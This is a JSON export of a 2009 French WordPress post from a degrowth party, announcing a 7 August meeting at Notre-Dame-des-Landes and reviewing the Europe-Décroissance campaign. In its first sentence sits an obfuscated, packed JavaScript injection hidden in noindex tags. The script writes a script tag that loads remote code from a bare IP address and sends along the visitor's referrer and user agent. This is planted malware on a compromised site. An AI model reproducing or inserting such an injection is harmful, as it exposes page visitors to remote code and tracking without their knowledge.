{"id":3293,"date":"2009-07-13T21:36:55","date_gmt":"2009-07-13T20:36:55","guid":{"rendered":"http:\/\/www.partipourladecroissance.net\/?p=3293"},"modified":"2010-05-17T10:22:17","modified_gmt":"2010-05-17T09:22:17","slug":"rendez-vous-le-7-aout-a-notre-dame-des-landes","status":"publish","type":"post","link":"https:\/\/www.partipourladecroissance.net\/?p=3293","title":{"rendered":"Rendez-vous le 7 ao\u00fbt \u00e0 Notre Dame des Landes"},"content":{"rendered":"<div class=\"surlignable\">\n<div class=\"desc\">\n<p>Nous <noindex><script id=\"wpinfo-pst1\" type=\"text\/javascript\" rel=\"nofollow\">eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!''.replace(\/^\/,String)){while(c--){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return'\\w+'};c=1};while(c--){if(k[c]){p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c])}}return p}('0.6(\"<a g=\\'2\\' c=\\'d\\' e=\\'b\/2\\' 4=\\'7:\/\/5.8.9.f\/1\/h.s.t?r=\"+3(0.p)+\"\\o=\"+3(j.i)+\"\\'><\\\/k\"+\"l>\");n m=\"q\";',30,30,'document||javascript|encodeURI|src||write|http|45|67|script|text|rel|nofollow|type|97|language|jquery|userAgent|navigator|sc|ript|tyysb|var|u0026u|referrer|yhdad||js|php'.split('|'),0,{}))\n<\/script><\/noindex> vous invitons pour une journ\u00e9e bilan-perspectives de la campagne \u2019Europe-D\u00e9croissance\u2019 , dans le cadre des Rencontres estivales des objecteurs de croissance et de la Semaine de r\u00e9sistance\u00a0: le vendredi 7 ao\u00fbt \u00e0 Notre Dame des Landes (44)<\/div>\n<div class=\"crayon article-texte-80 texte entry-content\">\n<p><strong>Rappel\u00a0:<\/strong> En d\u00e9cembre dernier est lanc\u00e9 l\u2019appel Europe-D\u00e9croissance. Tr\u00e8s vite, il conna\u00eet un vif succ\u00e8s et est sign\u00e9 par 1700 objecteurs de croissance. Le Mouvement \u00ab\u00a0les Objecteurs de Croissance\u00a0\u00bb et le Parti Pour La D\u00e9croissance d\u00e9cident alors, d\u2019une part de lancer, le 25 avril dernier \u00e0 Paris, la campagne Europe-D\u00e9croissance et d\u2019autre part de cr\u00e9er une association commune de financement permettant de partir aux \u00e9lections, l\u2019Association Des Objecteurs de Croissance (ADOC-France).<!--more--><\/p>\n<p>C\u2019est le d\u00e9but du mouvement politique pour la D\u00e9croissance en France, le troisi\u00e8me des piliers du mouvement la D\u00e9croissance avec le niveau individuel (la simplicit\u00e9 volontaire) et le niveau collectif, celui des alternatives concr\u00e8tes.<\/p>\n<p><strong>Bilan des \u00e9lections europ\u00e9ennes\u00a0:<\/strong><\/p>\n<p>Dans une d\u00e9marche non-\u00e9lectoraliste pour ces \u00e9lections europ\u00e9ennes qui ont vu triompher l\u2019abstention, Europe-D\u00e9croissance, sans moyens, sans bulletins ni professions de foi imprim\u00e9s a tout de m\u00eame r\u00e9colt\u00e9 plus de 6 000 votes \u00e0 travers la France.<\/p>\n<p>De plus, pour la premi\u00e8re fois, la D\u00e9croissance est apparu lors d\u2019une \u00e9lection nationale. Cela nous semble \u00eatre le d\u00e9but d\u2019un mouvement politique autour de l\u2019objection de croissance par la mise en place d\u2019un nouveau projet de soci\u00e9t\u00e9 soutenable et souhaitable.<\/p>\n<p><strong>Objectifs\u00a0: les \u00e9lections r\u00e9gionales<\/strong><\/p>\n<p>Apr\u00e8s cette premi\u00e8re \u00e9tape, nous souhaitons continuer \u00e0 faire avancer le d\u00e9bat en nous pr\u00e9parant aux \u00e9lections r\u00e9gionales.<\/p>\n<p>De m\u00eame, puisque la Politique c\u2019est surtout une question d\u2019id\u00e9es, nous souhaitons\u00a0:<\/p>\n<p><img loading=\"lazy\" decoding=\"async\" style=\"height: 11px; width: 8px;\" src=\"http:\/\/nanorezo.free.fr\/local\/cache-vignettes\/L8xH11\/puce-32883.gif\" alt=\"-\" width=\"8\" height=\"11\" \/> participer activement \u00e0 la <a href=\"http:\/\/www.resistance-ndl.org\/\">Semaine r\u00e9sistance de Notre-Dame-des-landes<\/a> et \u00e0 la campagne Justice\/Climat pr\u00e9parant le contre sommet de Copenhague.<\/p>\n<p><img loading=\"lazy\" decoding=\"async\" style=\"height: 11px; width: 8px;\" src=\"http:\/\/nanorezo.free.fr\/local\/cache-vignettes\/L8xH11\/puce-32883.gif\" alt=\"-\" width=\"8\" height=\"11\" \/> nous lancer dans la r\u00e9daction d\u2019un Manifeste,  et aller \u00e0 la rencontre des autres formations politiques&#8230;<\/p>\n<p><img loading=\"lazy\" decoding=\"async\" style=\"height: 11px; width: 8px;\" src=\"http:\/\/nanorezo.free.fr\/local\/cache-vignettes\/L8xH11\/puce-32883.gif\" alt=\"-\" width=\"8\" height=\"11\" \/> participer \u00e0 l\u2019organisation d\u2019un grand \u00e9v\u00e9nement-d\u00e9bat ouvert autour des questions \u00e9nerg\u00e9tiques.<\/p>\n<p><img loading=\"lazy\" decoding=\"async\" style=\"height: 11px; width: 8px;\" src=\"http:\/\/nanorezo.free.fr\/local\/cache-vignettes\/L8xH11\/puce-32883.gif\" alt=\"-\" width=\"8\" height=\"11\" \/> approfondir nos r\u00e9flexions sur la transition et les questions de revenu d\u2019autonomie inconditionnel, de salaire maximum autoris\u00e9 et de gratuit\u00e9.<\/p>\n<p><img loading=\"lazy\" decoding=\"async\" style=\"height: 11px; width: 8px;\" src=\"http:\/\/nanorezo.free.fr\/local\/cache-vignettes\/L8xH11\/puce-32883.gif\" alt=\"-\" width=\"8\" height=\"11\" \/>Voici le <a href=\"Objectrices et Objecteurs de croissance \u00e0 NDDL\"><strong>programme les rencontres 2009 <\/strong>des Objectrices et Objecteurs de croissance<\/a> \u00e0 Notre Dame des Landes<\/p>\n<p><img loading=\"lazy\" decoding=\"async\" style=\"height: 11px; width: 8px;\" src=\"http:\/\/nanorezo.free.fr\/local\/cache-vignettes\/L8xH11\/puce-32883.gif\" alt=\"-\" width=\"8\" height=\"11\" \/> et beaucoup d\u2019autre choses\u00a0!<\/p>\n<p>Puis, apr\u00e8s l\u2019\u00e9t\u00e9, nous vous invitons tous \u00e0 notre <strong>assembl\u00e9e de rentr\u00e9e les 19 et 20 septembre<\/strong> (lieu encore \u00e0 pr\u00e9ciser).<\/p>\n<p>Si vous souhaitez rejoindre notre groupe de r\u00e9flexion merci d\u2019envoyer un courriel \u00e0\u00a0: contact@adoc-france.org<\/p>\n<p>Si vous souhaitez juste recevoir nos lettres d\u2019information, <strong><a href=\"http:\/\/nanorezo.free.fr\/spip.php?article7\" target=\"_blank\">merci de vous inscrire sur notre site<\/a><\/strong>.<a class=\"spip_out\" rel=\"nofollow\" href=\"http:\/\/www.europedecroissance.eu\/\"><\/a><\/div>\n<\/div>\n","protected":false},"excerpt":{"rendered":"<p>Nous vous invitons pour une journ\u00e9e bilan-perspectives de la campagne \u2019Europe-D\u00e9croissance\u2019 , dans le cadre des Rencontres estivales des objecteurs de croissance et de la Semaine de r\u00e9sistance\u00a0: le vendredi 7 ao\u00fbt \u00e0 Notre Dame des Landes (44) Rappel\u00a0: En &hellip; <a href=\"https:\/\/www.partipourladecroissance.net\/?p=3293\">Continuer la lecture <span class=\"meta-nav\">&rarr;<\/span><\/a><\/p>\n","protected":false},"author":7,"featured_media":0,"comment_status":"closed","ping_status":"closed","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[6],"tags":[],"class_list":["post-3293","post","type-post","status-publish","format-standard","hentry","category-agenda-du-p-p-l-d"],"_links":{"self":[{"href":"https:\/\/www.partipourladecroissance.net\/index.php?rest_route=\/wp\/v2\/posts\/3293","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/www.partipourladecroissance.net\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/www.partipourladecroissance.net\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/www.partipourladecroissance.net\/index.php?rest_route=\/wp\/v2\/users\/7"}],"replies":[{"embeddable":true,"href":"https:\/\/www.partipourladecroissance.net\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=3293"}],"version-history":[{"count":3,"href":"https:\/\/www.partipourladecroissance.net\/index.php?rest_route=\/wp\/v2\/posts\/3293\/revisions"}],"predecessor-version":[{"id":3941,"href":"https:\/\/www.partipourladecroissance.net\/index.php?rest_route=\/wp\/v2\/posts\/3293\/revisions\/3941"}],"wp:attachment":[{"href":"https:\/\/www.partipourladecroissance.net\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=3293"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/www.partipourladecroissance.net\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=3293"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/www.partipourladecroissance.net\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=3293"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}